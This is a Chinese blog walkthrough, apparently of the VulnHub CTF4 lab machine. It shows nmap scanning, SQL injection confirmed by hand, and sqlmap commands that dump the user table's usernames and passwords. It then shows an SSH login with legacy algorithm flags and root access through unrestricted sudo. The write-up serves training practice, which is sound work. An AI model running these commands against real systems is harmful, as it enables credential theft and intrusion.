ctf4 vulnhub靶场

文章描述了一次针对192.168.181.150靶机的渗透测试过程,通过Nmap扫描端口,发现80端口上的博客系统可能有SQL注入漏洞。使用sqlmap工具进行深入探测,获取数据库信息,并通过SSH连接到目标机器,最终获得sudo权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一个简单的靶机训练

主机扫描端口发现

nmap -sP 192.168.181.0/24

nmap -p 1-65535 -A 192.168.181.150

在这里插入图片描述

进去80端口瞧瞧

在这里插入图片描述

到处看看

发现这个blog的url里面有个参数id,很有可能存在sql注入漏洞

在这里插入图片描述

手动试试

随便加个‘就报错了,一看就是有漏洞

在这里插入图片描述

太明显了,数值型注入

在这里插入图片描述

在这里插入图片描述

接下来就交给sqlmap吧

sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2"  --level 5 --risk 3

在这里插入图片描述

sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2"  --level 5 --risk 3 --dbs 

在这里插入图片描述

sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2"  --level 5 --risk 3 --current-db

在这里插入图片描述

sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2"  --level 5 --risk 3 -D ehks --tables

在这里插入图片描述

 sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2"  --level 5 --risk 3 -D ehks -T user -columns

在这里插入图片描述

sqlmap -u "http://192.168.181.150/index.html?page=blog&title=Blog&id=2"  --level 5 --risk 3 -D ehks -T user -C user_name,user_pass --dump

在这里插入图片描述

有密码,看看哪里登陆,扫扫目录看看

dirb http://192.168.181.150

admin一看就跟登陆有关

在这里插入图片描述

http://192.168.181.150/admin/

随便找个账户登陆看看

没卵用

在这里插入图片描述

那就直接ssh连接试试

直接用ssh user@192.168.181.150会报错

在这里插入图片描述

用这个方法连上了

ssh 登录旧设备的问题解决

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc dstevens@192.168.181.150

在这里插入图片描述

直接sudo -l查看可使用的sudo命令,竟然全都可以?!

在这里插入图片描述

那就直接sudo su

在这里插入图片描述

就这啊?

o了 😃

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值